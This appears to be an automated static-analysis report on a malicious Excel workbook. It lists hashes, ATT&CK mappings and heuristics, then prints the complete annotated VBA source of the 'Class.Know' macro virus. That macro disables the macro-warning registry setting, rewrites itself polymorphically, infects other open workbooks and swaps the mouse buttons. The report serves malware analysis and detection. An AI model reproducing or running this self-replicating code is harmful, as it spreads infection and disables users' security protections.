Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8dfc1ad1ebd89005…

MALICIOUS

Office (OLE)

25.0 KB Created: 1999-08-28 14:11:16 (document-metadata timestamp as written inside the file; attacker-controllable and not a reliable creation date) Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 46411446d940b7efb8e31bed1731e955 SHA-1: 032b99174d54c8b0d874098bba69fa590c63acf1 SHA-256: 8dfc1ad1ebd890054eaaf0915d3c97e69d8e9fa673a4d6f9d7903e38408b829a
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder (mapping caveat: the macro's only registry write targets HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6, an Excel option value, not a Run key or Startup folder; on the evidence in the listing that write is better described as disabling a security control, T1562.001, while persistence actually comes from the macro copying itself into the ThisWorkbook module of every open workbook)

The sample is an Excel workbook whose ThisWorkbook module (German-locale name "DieseArbeitsmappe") contains a self-replicating, polymorphic VBA macro virus rather than a simple downloader. On every Workbook_Deactivate event it (1) automates Word via CreateObject("word.application") and uses Word's System.PrivateProfileString with an empty file name to write Options6 = 0 under HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel — in Excel 97 (Office 8.0) this value governs the macro-virus-protection prompt, so the write is an attempt to switch that warning off, not a Run-key persistence entry; (2) reads its own source through the VBA project object model, replaces the comment text of every line with random high-bit characters and renames 20 identifiers, so each copy differs from its parent (the author's Rem lines credit a "PiE v2.0" polymorphic engine); (3) writes the mutated copy into the ThisWorkbook module of every other open workbook whose module is still empty; and (4) when the current minute equals 23, shows a message box and calls user32!SwapMouseButton to swap the mouse buttons. The ClamAV detection 'Xls.Trojan.Know-1' matches the author's own name for the code, "Class.Know", and is consistent with this behaviour.

Heuristics 3

  • ClamAV: Xls.Trojan.Know-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Know-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject("word.application"): the macro automates Word apparently only to reach Word's System.PrivateProfileString, which with an empty file-name argument reads/writes the registry; the object is released with obj.Quit immediately after the single registry write.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11367 bytes
SHA-256: 87f9788de392e35a2937e692231a181238a0838c52d17217513b9326e0100e3f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 import used by the payload at the end of Workbook_Deactivate: SwapMouseButton
' swaps the left and right mouse buttons when called with a non-zero argument.
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long '
Private Sub Workbook_Deactivate() '
' ANALYST NOTE: ThisWorkbook event handler; Excel raises it whenever this workbook
' loses focus, so the routine runs every time the user switches to another workbook.
' The engine below reads its own module text at run time (host.Lines), which is why
' every original line carries a trailing "'": the code before the apostrophe is kept
' and the comment after it is replaced with junk. Annotations are for reading only;
' do not execute this listing.
On Error Resume Next: Dim Virus(200) '
' Swallow every error for the rest of the routine. Virus() holds the rebuilt lines
' (indices 0-200); a module longer than that overflows silently under Resume Next.
Set obj = CreateObject("word.application"): obj.system.privateprofilestring("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: obj.Quit '
' Registry write through Word automation: Word's System.PrivateProfileString with an
' empty file name addresses the registry. Options6 under the Office 8.0 (Excel 97) key
' governs the macro-virus-protection prompt; writing 0 switches it off. This is a
' defense-evasion write, not a Run-key or Startup-folder persistence entry.
Const hostname = "DieseArbeitsmappe" '
' Name of the ThisWorkbook module in German-locale Excel; used both to read this
' module's own source and to locate the target module in other workbooks.
Set host = ActiveWorkbook.VBProject.VBComponents(hostname).CodeModule '
' Handle to this module's own source via the VBA project object model.
OurLines = host.CountOfLines: PiESize = 100 + Int(Rnd * 50): PiEChar = Chr(39) '
' PiESize: random line budget of 100-149 used to prune comment-only lines below;
' PiEChar is the apostrophe (comment marker).
For ix = 1 To OurLines: JunkCode = "": PiERnd = Int(Rnd * 3): PiEPos = InStr(host.Lines(ix, 1), PiEChar) '
' Per source line: PiERnd is 0, 1 or 2; PiEPos is the position of the first apostrophe.
If PiEPos = 1 And OurLines > PiESize Then PiERnd = 1: GoTo next_ '
' Comment-only lines are dropped once the module exceeds PiESize lines, which bounds
' the growth caused by the extra junk comment lines added further down.
Virus(ix) = Left(host.Lines(ix, 1), (PiEPos - 1)) '
' Keep only the code before the apostrophe. A line without one makes Left() fail here;
' under Resume Next that line degrades into a pure junk comment in the copy.
For jx = 1 To Int(75 - (Rnd * 20)): JunkCode = JunkCode & Chr(255 - Int(Rnd * 100)): Next '
' 55-75 random characters in the Chr(156)-Chr(255) range become the new comment text.
Virus(ix) = Virus(ix) & PiEChar & JunkCode '
' Code part unchanged, comment part replaced by random bytes (polymorphic camouflage).
If PiERnd = 2 Then Virus(ix) = Virus(ix) & vbCr & PiEChar & JunkCode '
' Roughly one line in three also gains an additional junk-only comment line.
FullCode = FullCode & Virus(ix) & vbCr '
next_: Next '
Dim VARIABLE(1 To 20) '
' The 20 identifiers listed below are renamed in every generated copy.
VARIABLE(1) = "Virus": VARIABLE(2) = "obj": VARIABLE(3) = "hostname": VARIABLE(4) = "host": VARIABLE(5) = "OurLines": VARIABLE(6) = "PiESize": VARIABLE(7) = "PiEChar": VARIABLE(8) = "ix" '
VARIABLE(9) = "JunkCode": VARIABLE(10) = "PiERnd": VARIABLE(11) = "PiEPos": VARIABLE(12) = "next_": VARIABLE(13) = "jx": VARIABLE(14) = "FullCode": VARIABLE(15) = "VARIABLE": VARIABLE(16) = "OUR_LOOP" '
VARIABLE(17) = "NEW_VAR": VARIABLE(18) = "VAR_POSITION": VARIABLE(19) = "NEXT_LINE": VARIABLE(20) = "target" '
For OUR_LOOP = 1 To 20 '
NEW_VAR = Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) & Int(Rnd * 999) '
' Replacement name: one uppercase letter A-V, one lowercase letter e-z, then a
' number 0-998.
VAR_POSITION = 1 '
NEXT_LINE: VAR_POSITION = InStr(VAR_POSITION, FullCode, VARIABLE(OUR_LOOP)) '
If VAR_POSITION <> 0 Then FullCode = Mid(FullCode, 1, (VAR_POSITION - 1)) & NEW_VAR & Mid(FullCode, (VAR_POSITION + Len(VARIABLE(OUR_LOOP))), Len(FullCode)): GoTo NEXT_LINE '
' Plain substring replacement of every occurrence (no word-boundary check), repeated
' until the old name no longer appears anywhere in FullCode.
Next '
For Each target In Workbooks '
If target.VBProject.VBComponents(hostname).CodeModule.CountOfLines < 2 Then target.VBProject.VBComponents(hostname).CodeModule.AddFromString FullCode '
' Infection step: the mutated copy is written into the ThisWorkbook module of every
' open workbook whose module is still empty (<2 lines); the guard also prevents
' re-infecting an already infected workbook.
Next '
If Minute(Now()) = 23 Then MsgBox "know, you never think you know why", 0, "Class.Know by jackie twoflower /Lz0NT /MVT /CC": SwapMouseButton &H2 '
' Payload, triggered only when the clock minute is 23: author-credit message box,
' then the mouse buttons are swapped via user32!SwapMouseButton (non-zero argument).
End Sub '
Rem Class.Know written by jackie twoflower /Lz0NT /MVT /CC '
Rem Uses PiE v2.0 for VBA '

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet module "Tabelle1" (German-locale "Sheet1"): attributes only, no code.

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet module "Tabelle2": attributes only, no code.

Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet module "Tabelle3": attributes only, no code. All executable logic in this
' sample lives in the DieseArbeitsmappe (ThisWorkbook) module above.

' Processing file: /opt/analyzer/scan_staging/3ef4e5b241c94612b9e0b1049ddf8c0a.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 6892 bytes
' Line #0:
' 	FuncDefn (Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long)
' 	QuoteRem 0x0053 0x0000 ""
' Line #1:
' 	FuncDefn (Private Sub Workbook_Deactivate())
' 	QuoteRem 0x0021 0x0000 ""
' Line #2:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x00C8 
' 	VarDefn Virus
' 	QuoteRem 0x0024 0x0000 ""
' Line #3:
' 	SetStmt 
' 
... (truncated)